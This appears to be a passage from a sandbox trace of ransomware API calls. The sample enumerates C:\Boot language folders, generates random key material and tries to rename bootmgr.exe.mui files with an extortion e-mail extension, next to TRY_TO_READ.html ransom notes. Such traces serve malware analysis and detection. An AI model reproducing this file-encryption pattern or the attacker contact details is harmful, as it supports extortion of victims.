[0116.636] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x362ef8 | out: pbBuffer=0x362ef8) returned 1 [0116.636] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330bf8 | out: pbBuffer=0x330bf8) returned 1 [0116.636] SetFileAttributesW (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.636] lstrlenW (lpString="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui") returned 30 [0116.636] GetProcessHeap () returned 0x2e0000 [0116.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.636] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui") returned="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" [0116.636] lstrcatW (in: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.636] MoveFileExW (lpExistingFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.636] CreateFileW (lpFileName="C:\\\\Boot\\tr-TR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.636] GetProcessHeap () returned 0x2e0000 [0116.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.636] CloseHandle (hObject=0xffffffff) returned 0 [0116.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.636] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350728 | out: hHeap=0x2e0000) returned 1 [0116.636] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350750 | out: hHeap=0x2e0000) returned 1 [0116.636] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-CN\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dbd8 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.637] GetLastError () returned 0x6 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350728 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dc18 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dc18 | out: hHeap=0x2e0000) returned 1 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350728 | out: hHeap=0x2e0000) returned 1 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.637] FindNextFileW (in: hFindFile=0x35dbd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x9702dc90, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.637] GetLastError () returned 0x6 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350728 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dc18 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dc18 | out: hHeap=0x2e0000) returned 1 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350728 | out: hHeap=0x2e0000) returned 1 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.637] FindNextFileW (in: hFindFile=0x35dbd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.637] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.637] GetLastError () returned 0x6 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350728 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.637] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350728 | out: hHeap=0x2e0000) returned 1 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.638] FindNextFileW (in: hFindFile=0x35dbd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.638] GetLastError () returned 0x6 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.638] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.638] FindNextFileW (in: hFindFile=0x35dbd8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9702dc90, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x9702dc90, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363000 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c08 [0116.638] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363000 | out: pbBuffer=0x363000) returned 1 [0116.638] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c08 | out: pbBuffer=0x330c08) returned 1 [0116.638] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.638] lstrlenW (lpString="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui") returned 30 [0116.638] GetProcessHeap () returned 0x2e0000 [0116.638] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.638] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" [0116.638] lstrcatW (in: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.638] MoveFileExW (lpExistingFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.638] CreateFileW (lpFileName="C:\\\\Boot\\zh-CN\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.639] GetProcessHeap () returned 0x2e0000 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.639] CloseHandle (hObject=0xffffffff) returned 0 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350778 | out: hHeap=0x2e0000) returned 1 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3507a0 | out: hHeap=0x2e0000) returned 1 [0116.639] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-HK\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97053df0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dc18 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.639] GetLastError () returned 0x6 [0116.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350778 [0116.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dc58 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dc58 | out: hHeap=0x2e0000) returned 1 [0116.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350778 | out: hHeap=0x2e0000) returned 1 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.639] FindNextFileW (in: hFindFile=0x35dc18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97053df0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0116.639] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.639] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.639] GetLastError () returned 0x6 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350778 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dc58 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dc58 | out: hHeap=0x2e0000) returned 1 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350778 | out: hHeap=0x2e0000) returned 1 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.640] FindNextFileW (in: hFindFile=0x35dc18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.640] GetLastError () returned 0x6 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x350778 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x350778 | out: hHeap=0x2e0000) returned 1 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3241b8 [0116.640] FindNextFileW (in: hFindFile=0x35dc18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97053df0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97053df0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.640] GetLastError () returned 0x6 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446f8 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446f8 | out: hHeap=0x2e0000) returned 1 [0116.640] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3446c0 | out: hHeap=0x2e0000) returned 1 [0116.640] FindNextFileW (in: hFindFile=0x35dc18, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97053df0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x97053df0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x324128 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363108 [0116.640] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x330c18 [0116.641] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363108 | out: pbBuffer=0x363108) returned 1 [0116.641] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x330c18 | out: pbBuffer=0x330c18) returned 1 [0116.641] SetFileAttributesW (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0116.641] lstrlenW (lpString="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui") returned 30 [0116.641] GetProcessHeap () returned 0x2e0000 [0116.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa2) returned 0x344ca0 [0116.641] lstrcpyW (in: lpString1=0x344ca0, lpString2="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui") returned="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" [0116.641] lstrcatW (in: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" [0116.641] MoveFileExW (lpExistingFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0 [0116.641] CreateFileW (lpFileName="C:\\\\Boot\\zh-HK\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0116.641] GetProcessHeap () returned 0x2e0000 [0116.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344ca0 | out: hHeap=0x2e0000) returned 1 [0116.641] CloseHandle (hObject=0xffffffff) returned 0 [0116.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324128 | out: hHeap=0x2e0000) returned 1 [0116.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3241b8 | out: hHeap=0x2e0000) returned 1 [0116.641] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x3446c0 [0116.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3507c8 | out: hHeap=0x2e0000) returned 1 [0116.641] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3507f0 | out: hHeap=0x2e0000) returned 1 [0116.641] FindFirstFileW (in: lpFileName="C:\\\\Boot\\zh-TW\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97053df0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35dc58 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3240e0 | out: hHeap=0x2e0000) returned 1 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x3240e0 [0116.642] GetLastError () returned 0x6 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x30) returned 0x344618 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x4c) returned 0x324bf0 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x324bf0 | out: hHeap=0x2e0000) returned 1 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20) returned 0x3507c8 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x34) returned 0x35dc98 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x35dc98 | out: hHeap=0x2e0000) returned 1 [0116.642] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x10) returned 0x340f60 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x340f60 | out: hHeap=0x2e0000) returned 1 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3507c8 | out: hHeap=0x2e0000) returned 1 [0116.642] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x344618 | out: hHeap=0x2e0000) returned 1 [0116.642] FindNextFileW (in: hFindFile=0x35dc58, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x97053df0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x97053df0, 